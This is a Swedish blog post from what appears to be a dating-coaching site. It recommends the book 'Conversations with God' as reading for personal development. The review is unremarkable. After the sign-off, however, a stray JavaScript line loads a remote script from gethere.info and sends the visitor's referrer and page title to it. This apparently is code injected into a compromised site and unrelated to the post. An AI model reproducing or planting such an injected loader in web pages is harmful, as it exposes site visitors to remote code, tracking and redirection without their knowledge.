48487 Boktips del 1

Tja alla!

Hoppas att ni haft en riktigt bra helg, själv sitter jag på helgens bootcamp med de andra instruktörerna och fem killar som nu har avslutningen av en riktigt intensiv helg framför sig. Söndag är ju min tur att blogga så igår satt jag och funderade lite på vad jag skulle skriva om när jag kom på att jag efter förra helgens seminarium fick massor av frågor om bra saker att läsa för att komma längre i den inre delen av sin utveckling och bli en mer ”solid” person.

Ni som var på seminariet har hört mig säga det hur många gånger som helst, men det tål att sägas igen (inte minst för alla er som inte hade möjlighet att närvara) – inre utveckling är ingen ersättning för att lära sig rätt yttre beteende! Likväl är inte yttre beteende tillräckligt för att få och behålla attraktiva kvinnor i sitt liv, man behöver båda delarna. Så just en söndag då de flesta förhoppningsvis har varit ute och pratat med massor av tjejer både fredag och lördag känns som en lämplig dag att prata lite om den typen av litteratur.

Jag tänkte alltså lista några böcker som jag rekommenderar alla att läsa, med en kort summering och recension av varje bok, med jämna mellanrum. Så här kommer det första boktipset!

Boken ”Samtal med gud” av Neale Donald Walsch. Det är en mycket intressant bok som är skriven av en amerikansk författare som hävdar att han i en svår period av sitt liv hamnade i en helt öppen diskussion med gud, utan något högtravande gammaltestamentiskt språk och dylikt. Vare sig man väljer att tro att det var exakt så det gick till eller inte (jag lutar nog mycket starkt åt ”inte”) så är boken grymt intressant och ger en hel del sjukt bra tankeställare. Inte minst diskussionen om hur man ändrar beteenden och sitt sätt att tänka genom att sluta tänka och HANDLA istället är grymt bra. Andra diskussioner som är bra tankeställare är det han skriver om vårt samhälles stigmatiserade syn på sex och relationer, hela konceptet med att vissa handlingar skulle vara ”synd” (vilket han avskriver som rent nonsens) och inte minst hans minst sagt tänkvärda svar på frågan, ”Vad är meningen med livet?”.

Det här är en bok som innehåller en helt enorm mängd med bra tankeställare, som jag skrev tidigare. Jag vill understryka att jag inte menar att allt han skriver är rätt, men det är något som gäller generellt. Det jag ber er läsa ska inte ses som ”facit” eller instruktionsböcker som kan levererar några ”rätta svar”, utan bra saker att ta del av för att utvidga sin egen verklighet och utmana sitt sätt att tänka. Kort sagt, det här är en bok som jag rekommenderar alla att läsa – kom gärna med egna kommentarer och recensioner på forumets reviewdel!

Trevlig läsning,
-Victor (Sanji)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;